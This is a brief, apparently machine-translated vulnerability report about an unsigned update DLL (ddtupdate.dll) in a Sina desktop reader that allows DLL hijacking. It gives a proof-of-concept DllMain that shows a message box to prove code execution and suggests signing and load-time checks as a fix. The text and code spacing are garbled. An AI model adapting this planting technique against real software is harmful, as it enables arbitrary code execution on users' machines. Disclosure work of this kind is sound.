I want to replace Google reader today .. find a "Sina diantong" Reader as usual .. first, analyze the structure .. then .... ddtupdate. dll found this goods first to see if it is into the table .. found. this item is not imported into the table, and it is found that this dll has no signature !! Another! Vulnerability proof: # include "windows. h "BOOL main_dll (void); # include" dll_zhuru.h "bool apientry DllMain (HMODULE hModule, DWORD plugin, LPVOID lpReserved) {switch (plugin) {case DLL_PROCESS_ATTACH: main_dll (); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break;} return TRUE;} BOOL main_dll (void) {MessageBoxA (NULL, "test pop-up window, this pop-up window Indicates code execution ", "test", MB_ OK); return TRUE ;};
But in fact, the Code has been executed. I don't know if this is a security issue in Sina's eyes .. however, it seems very serious to me. another hole that can be used to pass the "Physical Map ~ Solution: Judge when loading ~ It is best to sign ..